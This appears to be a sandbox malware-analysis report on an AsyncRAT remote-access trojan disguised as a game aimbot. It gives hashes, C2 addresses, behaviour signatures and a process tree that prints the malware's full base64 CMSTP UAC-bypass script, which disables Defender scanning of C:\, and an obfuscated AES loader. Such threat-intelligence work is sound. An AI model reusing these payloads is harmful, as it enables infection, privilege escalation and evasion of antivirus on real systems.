asyncrat | 78d7258c03f6f988b20803982bdbea34f7b2a2089f81bd9ed9fcc14daedded48

Analysis

max time kernel
93s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
26-12-2024 20:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AIM-BOT.exe
Size

9.8MB
MD5

ac85a22feba5e3aa51dec6d867d54081
SHA1

94f8dd4ec1465289935b626bbf12d5fd6755f40a
SHA256

78d7258c03f6f988b20803982bdbea34f7b2a2089f81bd9ed9fcc14daedded48
SHA512

a0c227a996020e15aaee7b58a499711a29ea6f27002d5ebf3ea05a061688755903d191851cf68f159878b2b9ce3854e6c3b04ec6a3a41fd8d7e90fced4bed4a0
SSDEEP

49152:huSvYfx7jJWLuTtutUAesgLH36HcJNI/GjtPw8Ws89cU210W9zY/bsiJhWbzZmUm:8SYjJWLu

Score

10^/10

asyncrat default discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

87.120.113.125:2101

87.120.113.125:55644

Mutex

E0GLVPl3iUqi

Attributes

delay
3
install
false
install_file
winserve.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/memory/3428-128-0x0000000005920000-0x0000000005932000-memory.dmp	family_asyncrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
45	3428	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2704	powershell.exe
4380	powershell.exe
3260	powershell.exe
2536	powershell.exe
3428	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
4536	AsyncRAT.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2032	taskkill.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 42 IoCs

pid	Process
2704	powershell.exe
2704	powershell.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4380	powershell.exe
4380	powershell.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
4536	AsyncRAT.exe
3260	powershell.exe
3260	powershell.exe
2536	powershell.exe
2536	powershell.exe
3428	powershell.exe
3428	powershell.exe
3428	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2704	powershell.exe
Token: SeDebugPrivilege	4380	powershell.exe
Token: SeDebugPrivilege	2032	taskkill.exe
Token: SeDebugPrivilege	3260	powershell.exe
Token: SeDebugPrivilege	2536	powershell.exe
Token: SeIncreaseQuotaPrivilege	2536	powershell.exe
Token: SeSecurityPrivilege	2536	powershell.exe
Token: SeTakeOwnershipPrivilege	2536	powershell.exe
Token: SeLoadDriverPrivilege	2536	powershell.exe
Token: SeSystemProfilePrivilege	2536	powershell.exe
Token: SeSystemtimePrivilege	2536	powershell.exe
Token: SeProfSingleProcessPrivilege	2536	powershell.exe
Token: SeIncBasePriorityPrivilege	2536	powershell.exe
Token: SeCreatePagefilePrivilege	2536	powershell.exe
Token: SeBackupPrivilege	2536	powershell.exe
Token: SeRestorePrivilege	2536	powershell.exe
Token: SeShutdownPrivilege	2536	powershell.exe
Token: SeDebugPrivilege	2536	powershell.exe
Token: SeSystemEnvironmentPrivilege	2536	powershell.exe
Token: SeRemoteShutdownPrivilege	2536	powershell.exe
Token: SeUndockPrivilege	2536	powershell.exe
Token: SeManageVolumePrivilege	2536	powershell.exe
Token: 33	2536	powershell.exe
Token: 34	2536	powershell.exe
Token: 35	2536	powershell.exe
Token: 36	2536	powershell.exe
Token: SeIncreaseQuotaPrivilege	2536	powershell.exe
Token: SeSecurityPrivilege	2536	powershell.exe
Token: SeTakeOwnershipPrivilege	2536	powershell.exe
Token: SeLoadDriverPrivilege	2536	powershell.exe
Token: SeSystemProfilePrivilege	2536	powershell.exe
Token: SeSystemtimePrivilege	2536	powershell.exe
Token: SeProfSingleProcessPrivilege	2536	powershell.exe
Token: SeIncBasePriorityPrivilege	2536	powershell.exe
Token: SeCreatePagefilePrivilege	2536	powershell.exe
Token: SeBackupPrivilege	2536	powershell.exe
Token: SeRestorePrivilege	2536	powershell.exe
Token: SeShutdownPrivilege	2536	powershell.exe
Token: SeDebugPrivilege	2536	powershell.exe
Token: SeSystemEnvironmentPrivilege	2536	powershell.exe
Token: SeRemoteShutdownPrivilege	2536	powershell.exe
Token: SeUndockPrivilege	2536	powershell.exe
Token: SeManageVolumePrivilege	2536	powershell.exe
Token: 33	2536	powershell.exe
Token: 34	2536	powershell.exe
Token: 35	2536	powershell.exe
Token: 36	2536	powershell.exe
Token: SeIncreaseQuotaPrivilege	2536	powershell.exe
Token: SeSecurityPrivilege	2536	powershell.exe
Token: SeTakeOwnershipPrivilege	2536	powershell.exe
Token: SeLoadDriverPrivilege	2536	powershell.exe
Token: SeSystemProfilePrivilege	2536	powershell.exe
Token: SeSystemtimePrivilege	2536	powershell.exe
Token: SeProfSingleProcessPrivilege	2536	powershell.exe
Token: SeIncBasePriorityPrivilege	2536	powershell.exe
Token: SeCreatePagefilePrivilege	2536	powershell.exe
Token: SeBackupPrivilege	2536	powershell.exe
Token: SeRestorePrivilege	2536	powershell.exe
Token: SeShutdownPrivilege	2536	powershell.exe
Token: SeDebugPrivilege	2536	powershell.exe
Token: SeSystemEnvironmentPrivilege	2536	powershell.exe
Token: SeRemoteShutdownPrivilege	2536	powershell.exe
Token: SeUndockPrivilege	2536	powershell.exe
Token: SeManageVolumePrivilege	2536	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4536	AsyncRAT.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
4536	AsyncRAT.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 224 wrote to memory of 3760	224	AIM-BOT.exe	82
PID 224 wrote to memory of 3760	224	AIM-BOT.exe	82
PID 224 wrote to memory of 2512	224	AIM-BOT.exe	83
PID 224 wrote to memory of 2512	224	AIM-BOT.exe	83
PID 3760 wrote to memory of 4536	3760	cmd.exe	86
PID 3760 wrote to memory of 4536	3760	cmd.exe	86
PID 2512 wrote to memory of 3144	2512	cmd.exe	87
PID 2512 wrote to memory of 3144	2512	cmd.exe	87
PID 3144 wrote to memory of 2704	3144	WScript.exe	88
PID 3144 wrote to memory of 2704	3144	WScript.exe	88
PID 2704 wrote to memory of 4464	2704	powershell.exe	92
PID 2704 wrote to memory of 4464	2704	powershell.exe	92
PID 4464 wrote to memory of 336	4464	csc.exe	93
PID 4464 wrote to memory of 336	4464	csc.exe	93
PID 2704 wrote to memory of 1448	2704	powershell.exe	94
PID 2704 wrote to memory of 1448	2704	powershell.exe	94
PID 3144 wrote to memory of 1604	3144	WScript.exe	110
PID 3144 wrote to memory of 1604	3144	WScript.exe	110
PID 1604 wrote to memory of 3260	1604	cmd.exe	112
PID 1604 wrote to memory of 3260	1604	cmd.exe	112
PID 1604 wrote to memory of 3260	1604	cmd.exe	112
PID 3260 wrote to memory of 2536	3260	powershell.exe	113
PID 3260 wrote to memory of 2536	3260	powershell.exe	113
PID 3260 wrote to memory of 2536	3260	powershell.exe	113
PID 3260 wrote to memory of 5012	3260	powershell.exe	116
PID 3260 wrote to memory of 5012	3260	powershell.exe	116
PID 3260 wrote to memory of 5012	3260	powershell.exe	116
PID 5012 wrote to memory of 2440	5012	WScript.exe	117
PID 5012 wrote to memory of 2440	5012	WScript.exe	117
PID 5012 wrote to memory of 2440	5012	WScript.exe	117
PID 2440 wrote to memory of 3428	2440	cmd.exe	119
PID 2440 wrote to memory of 3428	2440	cmd.exe	119
PID 2440 wrote to memory of 3428	2440	cmd.exe	119

C:\Users\Admin\AppData\Local\Temp\AIM-BOT.exe
"C:\Users\Admin\AppData\Local\Temp\AIM-BOT.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:224
- C:\Windows\SYSTEM32\cmd.exe
  cmd /k start AsyncRAT.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3760
- - C:\Users\Admin\AppData\Local\Temp\AsyncRAT.exe
    AsyncRAT.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:4536
- C:\Windows\SYSTEM32\cmd.exe
  cmd /k start 4698_output.vbs
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2512
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4698_output.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:3144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gcmFuZG9tWFlaLUludm9rZS1VQUMgewoKCnBhcmFtKAogICAgW1BhcmFtZXRlcihNYW5kYXRvcnkgPSAkdHJ1ZSldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpFeGVjdXRhYmxlLAogCiAgICBbUGFyYW1ldGVyKCldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpDb21tYW5kCikKCiRyYW5kb21YWVpJbmZEYXRhID0gQCcKW3ZlcnNpb25dClNpZ25hdHVyZT0kY2hpY2FnbyQKQWR2YW5jZWRJTkY9Mi41CgpbRGVmYXVsdEluc3RhbGxdCkN1c3RvbURlc3RpbmF0aW9uPXJhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnMKUnVuUHJlU2V0dXBDb21tYW5kcz1yYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb24KCltyYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb25dCkxJTkUKdGFza2tpbGwgL0lNIGNtc3RwLmV4ZSAvRgoKW3JhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnNdCjQ5MDAwLDQ5MDAxPXJhbmRvbVhZWi1BbGxVU2VyX0xESURTZWN0aW9uLCA3CgpbcmFuZG9tWFlaLUFsbFVTZXJfTERJRFNlY3Rpb25dCiJIS0xNIiwgIlNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXEFwcCBQYXRoc1xDTU1HUjMyLkVYRSIsICJQcm9maWxlSW5zdGFsbFBhdGgiLCAiJVVuZXhwZWN0ZWRFcnJvciUiLCAiIgoKW1N0cmluZ3NdClNlcnZpY2VOYW1lPSJyYW5kb21YWVpWUE4iClNob3J0U3ZjTmFtZT0icmFuZG9tWFlaVlBOIgonQAoKJHJhbmRvbVhZWkNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7CnVzaW5nIFN5c3RlbS5UZXh0Owp1c2luZyBTeXN0ZW0uSU87CnVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsKdXNpbmcgU3lzdGVtLkNvbXBvbmVudE1vZGVsOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpwdWJsaWMgY2xhc3MgcmFuZG9tWFlaQ01TVFBCeXBhc3MKewogICAgW0RsbEltcG9ydCgiU2hlbGwzMi5kbGwiLCBDaGFyU2V0ID0gQ2hhclNldC5BdXRvLCBTZXRMYXN0RXJyb3IgPSB0cnVlKV0KICAgIHN0YXRpYyBleHRlcm4gSW50UHRyIFNoZWxsRXhlY3V0ZShJbnRQdHIgaHduZCwgc3RyaW5nIGxwT3BlcmF0aW9uLCBzdHJpbmcgbHBGaWxlLCBzdHJpbmcgbHBQYXJhbWV0ZXJzLCBzdHJpbmcgbHBEaXJlY3RvcnksIGludCBuU2hvd0NtZCk7CgogICAgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXQogICAgc3RhdGljIGV4dGVybiBJbnRQdHIgRmluZFdpbmRvdyhzdHJpbmcgbHBDbGFzc05hbWUsIHN0cmluZyBscFdpbmRvd05hbWUpOwoKICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0KICAgIHN0YXRpYyBleHRlcm4gYm9vbCBQb3N0TWVzc2FnZShJbnRQdHIgaFduZCwgdWludCBNc2csIGludCB3UGFyYW0sIGludCBsUGFyYW0pOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIEJpbmFyeVBhdGggPSAiYzpcXHdpbmRvd3NcXHN5c3RlbTMyXFxjbXN0cC5leGUiOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIFNldEluZkZpbGUoc3RyaW5nIENvbW1hbmRUb0V4ZWN1dGUsIHN0cmluZyBJbmZEYXRhKQogICAgewogICAgICAgIFN0cmluZ0J1aWxkZXIgT3V0cHV0RmlsZSA9IG5ldyBTdHJpbmdCdWlsZGVyKCk7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIkM6XFx3aW5kb3dzXFx0ZW1wIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIlxcIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoUGF0aC5HZXRSYW5kb21GaWxlTmFtZSgpLlNwbGl0KENvbnZlcnQuVG9DaGFyKCIuIikpWzBdKTsKICAgICAgICBPdXRwdXRGaWxlLkFwcGVuZCgiLmluZiIpOwogICAgICAgIFN0cmluZ0J1aWxkZXIgbmV3SW5mRGF0YSA9IG5ldyBTdHJpbmdCdWlsZGVyKEluZkRhdGEpOwogICAgICAgIG5ld0luZkRhdGEuUmVwbGFjZSgiTElORSIsIENvbW1hbmRUb0V4ZWN1dGUpOwogICAgICAgIEZpbGUuV3JpdGVBbGxUZXh0KE91dHB1dEZpbGUuVG9TdHJpbmcoKSwgbmV3SW5mRGF0YS5Ub1N0cmluZygpKTsKICAgICAgICByZXR1cm4gT3V0cHV0RmlsZS5Ub1N0cmluZygpOwogICAgfQoKICAgIHB1YmxpYyBzdGF0aWMgYm9vbCByYW5kb21YWVpFeGVjdXRlKHN0cmluZyBDb21tYW5kVG9FeGVjdXRlLCBzdHJpbmcgSW5mRGF0YSkKICAgIHsKICAgICAgICBjb25zdCBpbnQgV01fU1lTS0VZRE9XTiA9IDB4MDEwMDsKICAgICAgICBjb25zdCBpbnQgVktfUkVUVVJOID0gMHgwRDsKCiAgICAgICAgU3RyaW5nQnVpbGRlciBJbmZGaWxlID0gbmV3IFN0cmluZ0J1aWxkZXIoKTsKICAgICAgICBJbmZGaWxlLkFwcGVuZChTZXRJbmZGaWxlKENvbW1hbmRUb0V4ZWN1dGUsIEluZkRhdGEpKTsKCiAgICAgICAgUHJvY2Vzc1N0YXJ0SW5mbyBzdGFydEluZm8gPSBuZXcgUHJvY2Vzc1N0YXJ0SW5mbyhCaW5hcnlQYXRoKTsKICAgICAgICBzdGFydEluZm8uQXJndW1lbnRzID0gIi9hdSAiICsgSW5mRmlsZS5Ub1N0cmluZygpOwogICAgICAgIHN0YXJ0SW5mby5XaW5kb3dTdHlsZSA9IFByb2Nlc3NXaW5kb3dTdHlsZS5IaWRkZW47ICAvLyBIaWRkZW4gd2luZG93CiAgICAgICAgSW50UHRyIGRwdHIgPSBNYXJzaGFsLkFsbG9jSEdsb2JhbCgxKTsKICAgICAgICBTaGVsbEV4ZWN1dGUoZHB0ciwgIiIsIEJpbmFyeVBhdGgsIHN0YXJ0SW5mby5Bcmd1bWVudHMsICIiLCAwKTsKCiAgICAgICAgVGhyZWFkLlNsZWVwKDMwMDApOwogICAgICAgIEludFB0ciBXaW5kb3dUb0ZpbmQgPSBGaW5kV2luZG93KG51bGwsICJyYW5kb21YWVpWUE4iKTsKCiAgICAgICAgUG9zdE1lc3NhZ2UoV2luZG93VG9GaW5kLCBXTV9TWVNLRVlET1dOLCBWS19SRVRVUk4sIDApOwogICAgICAgIFRocmVhZC5TbGVlcCg1MDAwKTsKICAgICAgICBGaWxlLkRlbGV0ZShJbmZGaWxlLlRvU3RyaW5nKCkpOwogICAgICAgIHJldHVybiB0cnVlOwogICAgfQp9CiJACgokcmFuZG9tWFlaQ29uc2VudFByb21wdCA9IChHZXQtSXRlbVByb3BlcnR5IEhLTE06XFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFBvbGljaWVzXFN5c3RlbSkuQ29uc2VudFByb21wdEJlaGF2aW9yQWRtaW4KJHJhbmRvbVhZWlNlY3VyZURlc2t0b3BQcm9tcHQgPSAoR2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxQb2xpY2llc1xTeXN0ZW0pLlByb21wdE9uU2VjdXJlRGVza3RvcAppZiAoJHJhbmRvbVhZWkNvbnNlbnRQcm9tcHQgLUVxIDIgLWFuZCAkcmFuZG9tWFlaU2VjdXJlRGVza3RvcFByb21wdCAtRXEgMSkgewogICAgcmV0dXJuCn0KCnRyeSB7CiAgICAkcmFuZG9tWFlaVXNlciA9IFtTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eV06OkdldEN1cnJlbnQoKS5OYW1lCiAgICAkcmFuZG9tWFlaQWRtID0gR2V0LUxvY2FsR3JvdXBNZW1iZXIgLVNJRCBTLTEtNS0zMi01NDQgfCBXaGVyZS1PYmplY3QgeyAkXy5OYW1lIC1lcSAkcmFuZG9tWFlaVXNlciB9Cn0gY2F0Y2ggewogICAgJHJhbmRvbVhZWlVzZXIgPSBbU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbC5XaW5kb3dzSWRlbnRpdHldOjpHZXRDdXJyZW50KCkuTmFtZQogICAgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgPSAnUy0xLTUtMzItNTQ0JwogICAgJHJhbmRvbVhZWkFkbWluR3JvdXAgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9Hcm91cCB8IFdoZXJlLU9iamVjdCB7ICRfLlNJRCAtZXEgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgfQogICAgJHJhbmRvbVhZWk1lbWJlcnMgPSAkcmFuZG9tWFlaQWRtaW5Hcm91cC5HZXRSZWxhdGVkKCJXaW4zMl9Vc2VyQWNjb3VudCIpCiAgICAkcmFuZG9tWFlaTWVtYmVycyB8IEZvckVhY2gtT2JqZWN0IHsgaWYgKCRfLkNhcHRpb24gLWVxICRyYW5kb21YWVpVc2VyKSB7ICRyYW5kb21YWVpBZG0gPSAkdHJ1ZSB9IH0KfQoKaWYgKCEkcmFuZG9tWFlaQWRtKSB7CiAgICByZXR1cm4KfQoKdHJ5IHsKICAgIGlmICghW1N5c3RlbS5JTy5GaWxlXTo6RXhpc3RzKCRyYW5kb21YWVpFeGVjdXRhYmxlKSkgewogICAgICAgICRyYW5kb21YWVpFeCA9IChHZXQtQ29tbWFuZCAkcmFuZG9tWFlaRXhlY3V0YWJsZSkKICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXguU291cmNlKSkgewogICAgICAgICAgICAkcmFuZG9tWFlaRXhlY3V0YWJsZSA9ICRFeGVjdXRpb25Db250ZXh0LlNlc3Npb25TdGF0ZS5QYXRoLkdldFVucmVzb2x2ZWRQcm92aWRlclBhdGhGcm9tUFNQYXRoKCRyYW5kb21YWVpFeGVjdXRhYmxlKQogICAgICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXhlY3V0YWJsZSkpIHsKICAgICAgICAgICAgICAgIHJldHVybgogICAgICAgICAgICB9CiAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgJHJhbmRvbVhZWkV4ZWN1dGFibGUgPSAoR2V0LUNvbW1hbmQgJHJhbmRvbVhZWkV4ZWN1dGFibGUpLk5hbWUKICAgICAgICB9CiAgICB9Cn0gY2F0Y2ggewogICAgcmV0dXJuCn0KCmlmICgkcmFuZG9tWFlaRXhlY3V0YWJsZS5Db250YWlucygicG93ZXJzaGVsbCIpKSB7CiAgICBpZiAoJHJhbmRvbVhZWkNvbW1hbmQgLW5lICIiKSB7CiAgICAgICAgJHJhbmRvbVhZWkZpbmFsID0gInBvd2Vyc2hlbGwgLVdpbmRvd1N0eWxlIEhpZGRlbiAtYyAiIiRyYW5kb21YWVpDb21tYW5kIiIiCiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlaWYgKCRyYW5kb21YWVpFeGVjdXRhYmxlLkNvbnRhaW5zKCJjbWQiKSkgewogICAgaWYgKCRyYW5kb21YWVpDb21tYW5kIC1uZSAiIikgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICJjbWQgL2MgIiIkcmFuZG9tWFlaQ29tbWFuZCIiIiAgIyBDaGFuZ2VkIHRvIC9jIHRvIGNsb3NlIHRoZSBjbWQgd2luZG93CiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlIHsKICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKfQoKZnVuY3Rpb24gcmFuZG9tWFlaRXhlY3V0ZSB7CiAgICB0cnkgewogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9IGNhdGNoIHsKICAgICAgICBBZGQtVHlwZSAkcmFuZG9tWFlaQ29kZQogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9CgogICAgaWYgKCRyYW5kb21YWVpSZXN1bHQpIHsKICAgICAgICByZXR1cm4KICAgIH0gZWxzZSB7CiAgICAgICAgcmV0dXJuCiAgICB9Cn0KCiRyYW5kb21YWVpQcm9jZXNzID0gKChHZXQtV21pT2JqZWN0IC1DbGFzcyB3aW4zMl9wcm9jZXNzKS5uYW1lIHwgU2VsZWN0LVN0cmluZyAiY21zdHAiIHwgU2VsZWN0LU9iamVjdCAqIC1GaXJzdCAxKS5QYXR0ZXJuCmlmICgkcmFuZG9tWFlaUHJvY2VzcyAtZXEgImNtc3RwIikgewogICAgdHJ5IHsKICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgImNtc3RwIiAtRm9yY2UKICAgICAgICByYW5kb21YWVpFeGVjdXRlCiAgICB9IGNhdGNoIHsKICAgICAgICByZXR1cm4KICAgIH0KfSBlbHNlIHsKICAgIHJhbmRvbVhZWkV4ZWN1dGUKfQp9CgojIEZ1bmN0aW9uIENhbGwKcmFuZG9tWFlaLUludm9rZS1VQUMgLXJhbmRvbVhZWkV4ZWN1dGFibGUgInBvd2Vyc2hlbGwiIC1yYW5kb21YWVpDb21tYW5kICIuKCdBZGQtTXBQJyArICdyZWZlcmVuY2UnKSAtRXhjbHVzaW9uUGF0aCBDOlwgLUV4Y2x1c2lvblByb2Nlc3MgcG93ZXJzaGVsbC5leGUi')))
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2704
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\copz1giv\copz1giv.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4464
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD793.tmp" "c:\Users\Admin\AppData\Local\Temp\copz1giv\CSC4994E992B7542B289E4FED4A6C8252E.TMP"
        6⤵
        
        PID:336
    - - C:\windows\system32\cmstp.exe
        
        "C:\windows\system32\cmstp.exe" /au C:\windows\temp\khxbaa2i.inf
        5⤵
        
        PID:1448
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1604
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ IEX '#EspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNK '.Replace('Espaco', ''); $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rr8+grcZJNGH203eeUxXpnDWX4hdpd2UTJfbowjN1dY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] 